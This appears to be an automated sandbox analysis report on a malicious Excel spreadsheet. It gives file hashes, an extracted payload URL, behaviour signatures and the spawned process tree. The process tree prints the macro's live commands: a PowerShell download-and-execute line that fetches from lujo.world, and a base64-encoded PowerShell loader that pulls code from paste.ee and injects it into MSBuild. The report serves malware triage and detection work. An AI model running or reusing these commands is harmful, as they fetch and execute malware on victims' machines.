Analysis
-
max time kernel
135s -
max time network
128s -
platform
windows10_x64 -
resource
win10 -
submitted
14-07-2020 13:43
Static task
static1
Behavioral task
behavioral1
Sample
290132621.xls
Resource
win7v200430
Behavioral task
behavioral2
Sample
290132621.xls
Resource
win10
General
-
Target
290132621.xls
-
Size
380KB
-
MD5
d0d45ae970be361aa26e069a0688d250
-
SHA1
3abf3aced0effd49f2e3684496e27173c827e90d
-
SHA256
88feb55be08b475bebdd8a2f6a78f14bd70f678f11943d8bb656163ea50985b6
-
SHA512
e5e94044642f72ae758b81b0155896c1f78b32d5ae6e231858900cf55e9d30081f24cc72e20283332fb2a2c5fc60ac318e02947964e0f3ca6dc7c9cae0b21477
Malware Config
Extracted
http://lujo.world/parse.jpg
Signatures
-
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 2920 EXCEL.EXE 2920 EXCEL.EXE 2920 EXCEL.EXE 2920 EXCEL.EXE 2920 EXCEL.EXE 2920 EXCEL.EXE 2920 EXCEL.EXE 2920 EXCEL.EXE 2920 EXCEL.EXE 2920 EXCEL.EXE 2920 EXCEL.EXE 2920 EXCEL.EXE 2920 EXCEL.EXE 2920 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3168 2920 powersheLL.exe EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powersheLL.exepowershell.exedescription pid process Token: SeDebugPrivilege 3168 powersheLL.exe Token: SeDebugPrivilege 508 powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powersheLL.exepowershell.exepid process 3168 powersheLL.exe 3168 powersheLL.exe 3168 powersheLL.exe 508 powershell.exe 508 powershell.exe 508 powershell.exe -
Blacklisted process makes network request 3 IoCs
Processes:
powersheLL.exepowershell.exeflow pid process 10 3168 powersheLL.exe 12 508 powershell.exe 13 508 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2920 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
EXCEL.EXEpowersheLL.exedescription pid process target process PID 2920 wrote to memory of 3168 2920 EXCEL.EXE powersheLL.exe PID 2920 wrote to memory of 3168 2920 EXCEL.EXE powersheLL.exe PID 3168 wrote to memory of 508 3168 powersheLL.exe powershell.exe PID 3168 wrote to memory of 508 3168 powersheLL.exe powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\290132621.xls"1⤵
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
- Enumerates system info in registry
PID:2920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://lujo.world/parse.jpg')2⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAB2AGMAbgB5AEQAcgBOAEoAIAA9ACAAKAAnAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACcALQBmACcAZABTAHQAJwAsACcAcgBpAG4AJwAsABwgYABEAGAAbwBgAHcAbgBgAGwAYABvAGEAHSAsACcAZwAnACkAOwBbAHYAbwBpAGQAXQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAnAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjACcAKQA7ACQAbgBMAFcATQBrAGQARABXAE0AQQBVAHgAVwBZAHgASgBVAG0ATQBSAGMAawBqAFYARwBwAGUAWgBOAEsAeABWAGoAdwBaAFIAdgB5AHgAcABZAG4AWgBnAGMAZgBnAGUAQgBUAHEAYwBVAHAAQQBqAG4AVABrAHcAaABCAFIAZwBiAEwAbwBRAEsAUwBkAFEAeQBEAE4AQgBzAE4AVwBuAFgAcQBqAD0AWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEkAbgB0AGUAcgBhAGMAdABpAG8AbgBdADoAOgBDAGEAbABsAEIAeQBuAGEAbQBlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAHCBgAE4AYABlAGAAVABgAC4AYABXAGAAZQBgAEIAYABDAGAAbABgAGkAYABlAGAATgBgAFQAHSApACwAJAB2AGMAbgB5AEQAcgBOAEoALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AQwA0AEYAUAA2AC8AMAAnACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAG4ATABXAE0AawBkAEQAVwBNAEEAVQB4AFcAWQB4AEoAVQBtAE0AUgBjAGsAagBWAEcAcABlAFoATgBLAHgAVgBqAHcAWgBSAHYAeQB4AHAAWQBuAFoAZwBjAGYAZwBlAEIAVABxAGMAVQBwAEEAagBuAFQAawB3AGgAQgBSAGcAYgBMAG8AUQBLAFMAZABRAHkARABOAEIAcwBOAFcAbgBYAHEAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHYAYwBuAHkARAByAE4ASgAsAFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBDAGEAbABsAFQAeQBwAGUAXQA6ADoATQBlAHQAaABvAGQALAAnAGgAdAB0ACcAKwBbAEMAaABhAHIAXQA4ADAAKwAnAHMAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAEcAVwBZADkAeAAnACkALgByAGUAcABsAGEAYwBlACgAJwBAACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAQwAuAE0AXQA6ADoAUgAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAG4ATABXAE0AawBkAEQAVwBNAEEAVQB4AFcAWQB4AEoAVQBtAE0AUgBjAGsAagBWAEcAcABlAFoATgBLAHgAVgBqAHcAWgBSAHYAeQB4AHAAWQBuAFoAZwBjAGYAZwBlAEIAVABxAGMAVQBwAEEAagBuAFQAawB3AGgAQgBSAGcAYgBMAG8AUQBLAFMAZABRAHkARABOAEIAcwBOAFcAbgBYAHEAKQA=3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:508